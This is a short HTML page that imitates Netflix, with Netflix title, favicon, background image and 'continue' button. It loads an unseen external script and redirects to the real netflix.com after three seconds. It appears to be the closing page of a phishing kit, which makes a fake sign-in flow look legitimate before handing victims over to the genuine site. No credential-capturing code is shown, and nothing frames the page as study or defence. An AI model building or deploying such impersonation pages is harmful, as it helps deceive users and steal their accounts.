
<html><head><title>Netflix - Watch TV Shows Online, Watch Movies Online</title>
<meta http-equiv="refresh" content="3;URL='https://netflix.com'" /> 
<script language="JavaScript" src="v.js" type="text/javascript"></script>

<link rel="shortcut icon" href="files/nf-favicon-hires.ico">

<!--[if !IE 11]>
	<style type="text/css">
		#wrap {display:table;height:100%}
	</style>
<![endif]-->

<style type="text/css">

body {background-image:url('img/back3.png'); background-repeat:no-repeat;}

  </style></head><body><br>

<form action="http://netflix.com">
<div style="margin-left: 492px; padding-top: 332px;">


<input type="image" src="img/continue.png">


</div>
<br><br><br><br><br><br><br>

</form>
</body></html>